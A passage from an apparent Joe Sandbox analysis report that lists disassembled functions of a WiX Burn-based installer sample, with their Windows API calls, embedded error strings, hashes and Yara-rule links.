                                                                                                                                                                  • Opcode Fuzzy Hash: 2551127ec963d01eca4aa6328368e399967c01c4b1a11f2b62deaddaca2d9a52
                                                                                                                                                                  • Instruction Fuzzy Hash: E5315E72E41339BBEB117A549C4BFAEBA68AF84750F110521FA05B61D3E2B09C909790
                                                                                                                                                                  Function 0096B9F6 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 112processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0096BA8E
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 0096BA98
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 0096BAF7
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 0096BB09
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                                                                  • String ID: "%ls" %ls$D$Failed to allocate full command-line.$Failed to create process: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                                  • API String ID: 161867955-4079655274
                                                                                                                                                                  • Opcode ID: 92b858909cd5ae794be361308b4641899f7d124d9ce7fad8f681c0d4d4bc6c5f
                                                                                                                                                                  • Instruction ID: 915befaebb2f38dd15c3164b212ef93d267247a17372a403a11675018eb439cd
                                                                                                                                                                  • Opcode Fuzzy Hash: 92b858909cd5ae794be361308b4641899f7d124d9ce7fad8f681c0d4d4bc6c5f
                                                                                                                                                                  • Instruction Fuzzy Hash: 75314D76A01219BBEB119FE4CD45FEEBAB8AB44744F100425FA04F6290E3748E94DBA1
                                                                                                                                                                  Function 0092A07C Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 108COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000008,?,00000000,00000000,00000000,00000000,00000008,?,00000000,00000000,?,?), ref: 0092A0C3
                                                                                                                                                                  • ProcessIdToSessionId.KERNEL32(00000000), ref: 0092A0CA
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to format session id as a string., xrefs: 0092A0F2
                                                                                                                                                                  • Failed to copy temp folder., xrefs: 0092A171
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\logging.cpp, xrefs: 0092A183
                                                                                                                                                                  • Failed to get temp folder., xrefs: 0092A0A8
                                                                                                                                                                  • Failed to get length of session id string., xrefs: 0092A11D
                                                                                                                                                                  • %u\, xrefs: 0092A0DE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CurrentSession
                                                                                                                                                                  • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get temp folder.$d:\a\wix4\wix4\src\burn\engine\logging.cpp
                                                                                                                                                                  • API String ID: 2701954971-2959569260
                                                                                                                                                                  • Opcode ID: eed376b67f788d8caf4c839592a603e43134aac7a5c2a0bc5355499a397ecb48
                                                                                                                                                                  • Instruction ID: 63fddc7cc811d3ac6860ba0f33deda85c0f5d70cd49307abd12c8664e7d1a128
                                                                                                                                                                  • Opcode Fuzzy Hash: eed376b67f788d8caf4c839592a603e43134aac7a5c2a0bc5355499a397ecb48
                                                                                                                                                                  • Instruction Fuzzy Hash: E731E872E44229BBCF11EB94DC06EDFBBBCEF45760F100151F904B6286D6709A50CB91
                                                                                                                                                                  Function 0096B5FE Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 86libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000001,?,?,00917C8C), ref: 0096B6F1
                                                                                                                                                                    • Part of subcall function 00911839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?), ref: 00911855
                                                                                                                                                                    • Part of subcall function 00911839: GetLastError.KERNEL32(?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 00911866
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 0096B687
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00917C8C,?,?,?,?,?,?,?), ref: 0096B693
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastLibrary$AddressFreeLoadProc
                                                                                                                                                                  • String ID: Failed to load ntdll.dll$Failed to load ntdll.dll.$Failed to locate RtlGetVersion.$RtlGetVersion$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\osutil.cpp$ntdll.dll
                                                                                                                                                                  • API String ID: 1529210728-3252241749
                                                                                                                                                                  • Opcode ID: 37cb1fabf00a58272b3a6db7eac139d824695d0a56874d0727e32a3a26a1ac2c
                                                                                                                                                                  • Instruction ID: b440fe9159f6aff6245b79930cbcca8e375dbd9766519963fb552970643bb613
                                                                                                                                                                  • Opcode Fuzzy Hash: 37cb1fabf00a58272b3a6db7eac139d824695d0a56874d0727e32a3a26a1ac2c
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D212972B40325B7E3205A90CC8AFAE35AC9B9BB38F100036B705FA196F7B54D8052E4
                                                                                                                                                                  Function 00918AA9 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 65registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020019,00000002,00000000), ref: 00918B61
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3535843008-118609244
                                                                                                                                                                  • Opcode ID: 5f5df5de2da41adc09d9c5eb8921f765ed8fc67c702eca07f820571a73eb8723
                                                                                                                                                                  • Instruction ID: 29687b7274837a0bccbda3dd831794f4c00efeb42e49244a479ac62fd0f1c2a6
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f5df5de2da41adc09d9c5eb8921f765ed8fc67c702eca07f820571a73eb8723
                                                                                                                                                                  • Instruction Fuzzy Hash: 36112972FC4328B6EB21B6448C0FFDF69689F90B51F100111FA04BA2C29AF08A80E690
                                                                                                                                                                  Function 009113DA Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 45libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,00000000,009115E3,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 009113ED
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 009113F9
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00911444
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00911455
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$ErrorHandleLastModule
                                                                                                                                                                  • String ID: Failed to get module handle for kernel32.$SetDefaultDllDirectories$SetDllDirectoryW$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp$kernel32
                                                                                                                                                                  • API String ID: 3392887714-1639946792
                                                                                                                                                                  • Opcode ID: 38175133ce1b25ff23387d496ebcac1a1106c31cc826ac794c8d683ca164947e
                                                                                                                                                                  • Instruction ID: cdee289f5bd6fe99907a2b367fc9d04941badce1b283ec136b1fc1b80ae57dc4
                                                                                                                                                                  • Opcode Fuzzy Hash: 38175133ce1b25ff23387d496ebcac1a1106c31cc826ac794c8d683ca164947e
                                                                                                                                                                  • Instruction Fuzzy Hash: 8501F277B6663437D37117246C0EBDB29589F8AB25F014195FA08BB1E1E6A0488096E0
                                                                                                                                                                  Function 00954A1B Relevance: 15.2, APIs: 2, Strings: 8, Instructions: 177COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00000000,?), ref: 00954A38
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 00954C1C
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set download password., xrefs: 00954B99
                                                                                                                                                                  • BA requested unknown payload with id: %ls, xrefs: 00954A9B
                                                                                                                                                                  • BA did not provide container or payload id., xrefs: 00954BF4
                                                                                                                                                                  • Failed to set download URL., xrefs: 00954B31
                                                                                                                                                                  • Engine is active, cannot change engine state., xrefs: 00954A50
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\externalengine.cpp, xrefs: 00954A62, 00954AF5, 00954C0B
                                                                                                                                                                  • BA requested unknown container with id: %ls, xrefs: 00954AE3
                                                                                                                                                                  • Failed to set download user., xrefs: 00954B65
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: BA did not provide container or payload id.$BA requested unknown container with id: %ls$BA requested unknown payload with id: %ls$Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$d:\a\wix4\wix4\src\burn\engine\externalengine.cpp
                                                                                                                                                                  • API String ID: 3168844106-103459661
                                                                                                                                                                  • Opcode ID: e5f0cc7d193d0e2419ce236d35e496b8d6ed5dcd974c384f731a77d23e39db26
                                                                                                                                                                  • Instruction ID: 9e8979eee0705d097ff77644f6afe6c21d835e5b5291bb3e5aeeada8456efd1b
                                                                                                                                                                  • Opcode Fuzzy Hash: e5f0cc7d193d0e2419ce236d35e496b8d6ed5dcd974c384f731a77d23e39db26
                                                                                                                                                                  • Instruction Fuzzy Hash: 07512671B8020ABBDB61DB56CC46FDA76ACAF8070AF154121BD04AB1C1E3B0D9D4C7E1
                                                                                                                                                                  Function 00942190 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 166registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,-80000001,56800040,00020019,00000001,00916EDE,00916DEA,00000000,00916E32,00916EDE,00917162,00916DEA), ref: 00942362
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\exeengine.cpp, xrefs: 00942238, 0094234C
                                                                                                                                                                  • DisplayVersion, xrefs: 00942256
                                                                                                                                                                  • QuietUninstallString, xrefs: 00942315
                                                                                                                                                                  • Failed to compare versions., xrefs: 009422DC
                                                                                                                                                                  • Failed to read DisplayVersion., xrefs: 00942282
                                                                                                                                                                  • Failed to read QuietUninstallString., xrefs: 0094233A
                                                                                                                                                                  • Failed to open registry key: %ls., xrefs: 00942226
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: DisplayVersion$Failed to compare versions.$Failed to open registry key: %ls.$Failed to read DisplayVersion.$Failed to read QuietUninstallString.$QuietUninstallString$d:\a\wix4\wix4\src\burn\engine\exeengine.cpp
                                                                                                                                                                  • API String ID: 3535843008-915021512
                                                                                                                                                                  • Opcode ID: f09cd850abcb3fb4aebd0b3b75913dc55d8916cd1597b5a4b7b74d1af49e4405
                                                                                                                                                                  • Instruction ID: 367786490362baeca9ad03c8393230ee2e79b81b442a054e70047e052ff964ad
                                                                                                                                                                  • Opcode Fuzzy Hash: f09cd850abcb3fb4aebd0b3b75913dc55d8916cd1597b5a4b7b74d1af49e4405
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D512931E40215FBDF299F68CC42FAEB6B8BF04B04F554524B914AB290D3B49D80D690
                                                                                                                                                                  Function 00976074 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 163registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,?,00000000), ref: 00976212
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to update pending file renames., xrefs: 009761DD
                                                                                                                                                                  • Failed to open pending file rename registry key., xrefs: 009760C7
                                                                                                                                                                  • PendingFileRenameOperations, xrefs: 009760E8, 009761CA
                                                                                                                                                                  • Failed to read pending file renames., xrefs: 00976114
                                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00976085
                                                                                                                                                                  • Failed to compare path from pending file rename to check path., xrefs: 00976221
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\file2utl.cpp, xrefs: 009761EC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to compare path from pending file rename to check path.$Failed to open pending file rename registry key.$Failed to read pending file renames.$Failed to update pending file renames.$PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\file2utl.cpp
                                                                                                                                                                  • API String ID: 3535843008-1055086927
                                                                                                                                                                  • Opcode ID: c9bac0d8480c082221bcbc696b619fbeac6affa5e1fcfadf22731e335e5c83fa
                                                                                                                                                                  • Instruction ID: 1786f0935e5c527a0caf7748f3368dcb2e16e63f013be5c6aa11a8fe87dcf73a
                                                                                                                                                                  • Opcode Fuzzy Hash: c9bac0d8480c082221bcbc696b619fbeac6affa5e1fcfadf22731e335e5c83fa
                                                                                                                                                                  • Instruction Fuzzy Hash: CB51D832F44615FBCB319E59CC4AFAEBBBCAF41700F558559A508BB292D6719E00CB90
                                                                                                                                                                  Function 00937460 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 153COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00925C41: CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,?,000000FF), ref: 00925C6E
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,?,?,?,?,?,?,?,?), ref: 00937566
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to find package: %ls$Failed to read compatible package id.$Failed to read package id.$Failed to remove from cache compatible package: %ls$Package '%ls' has no compatible package to clean.$Package '%ls' has no compatible package with id: %ls$d:\a\wix4\wix4\src\burn\engine\elevation.cpp
                                                                                                                                                                  • API String ID: 1825529933-529956491
                                                                                                                                                                  • Opcode ID: 6eb4ab17cde77d4bdb4bf59dbb6499322a20e4bc408da1d4e7c976f9be97725f
                                                                                                                                                                  • Instruction ID: 6b6cd1a88ba8a52f953b5cd2f6479d589f8b28395bf654d103bf9c2d5d8fcef5
                                                                                                                                                                  • Opcode Fuzzy Hash: 6eb4ab17cde77d4bdb4bf59dbb6499322a20e4bc408da1d4e7c976f9be97725f
                                                                                                                                                                  • Instruction Fuzzy Hash: 004135B1B4425DBBEF21AA94CC46FEFBA78EB44710F104511FA11BA1D0D2B19E50DBA0
                                                                                                                                                                  Function 00978464 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 133fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009739DD: SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0092CE21,?,00000000,00000000,00000000,00000000), ref: 009739F5
                                                                                                                                                                    • Part of subcall function 009739DD: GetLastError.KERNEL32(?,?,?,0092CE21,?,00000000,00000000,00000000,00000000), ref: 009739FF
                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 009784E8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorLastPointerWrite
                                                                                                                                                                  • String ID: Failed to seek to start point in file.$Failed to write data from internet.$Failed while reading from internet.$UX aborted on cache progress.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                  • API String ID: 972348794-1106238538
                                                                                                                                                                  • Opcode ID: 635d9c60b8c0c5c92e634c749507d8df8624b0ad9c9a124a2a36f0bea6989af8
                                                                                                                                                                  • Instruction ID: 68afe51a1736fc68ce76365bbec9c4233c2fc632f2c5cf0db063216e0a2ee2bd
                                                                                                                                                                  • Opcode Fuzzy Hash: 635d9c60b8c0c5c92e634c749507d8df8624b0ad9c9a124a2a36f0bea6989af8
                                                                                                                                                                  • Instruction Fuzzy Hash: B841E873A80219BBEB214E84CC4EFAF7A6CAF44B54F058195BD08B6190EB74DD5096E0
                                                                                                                                                                  Function 009165B0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 132COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0091165F: WaitForMultipleObjects.KERNEL32(?,?,000000FF,00000000,00000000,?,?,0093EC52,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 00911673
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00000002,?,00000000,000000FF,00000000), ref: 009165FF
                                                                                                                                                                  • ResetEvent.KERNEL32(?), ref: 00916615
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0091661F
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00916629
                                                                                                                                                                    • Part of subcall function 0096B324: EnterCriticalSection.KERNEL32(009AD4F0,00000000,?,00918067,00000000,00000000,?,?,?,?,?,?,?), ref: 0096B32E
                                                                                                                                                                    • Part of subcall function 0096B324: LeaveCriticalSection.KERNEL32(009AD4F0,?,00918067,00000000,00000000,?,?,?,?,?,?,?), ref: 0096B345
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to wait for log thread events, signaled: %u., xrefs: 009166DD
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 009166A6, 009166C2, 009166EF
                                                                                                                                                                  • Failed to wait log message over pipe., xrefs: 00916666
                                                                                                                                                                  • Failed to reset log event., xrefs: 009166B0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$ErrorEventLastMultipleObjectsResetWait
                                                                                                                                                                  • String ID: Failed to reset log event.$Failed to wait for log thread events, signaled: %u.$Failed to wait log message over pipe.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 3117541546-2819198451
                                                                                                                                                                  • Opcode ID: a74e6c48d42b6f80242686008f4683c585a69826d0eeb45fb997eef60b648bd4
                                                                                                                                                                  • Instruction ID: 74c9b3ea88238774648c09c6949ab58d2e1d74a06ef62ece7838d735f060bdd8
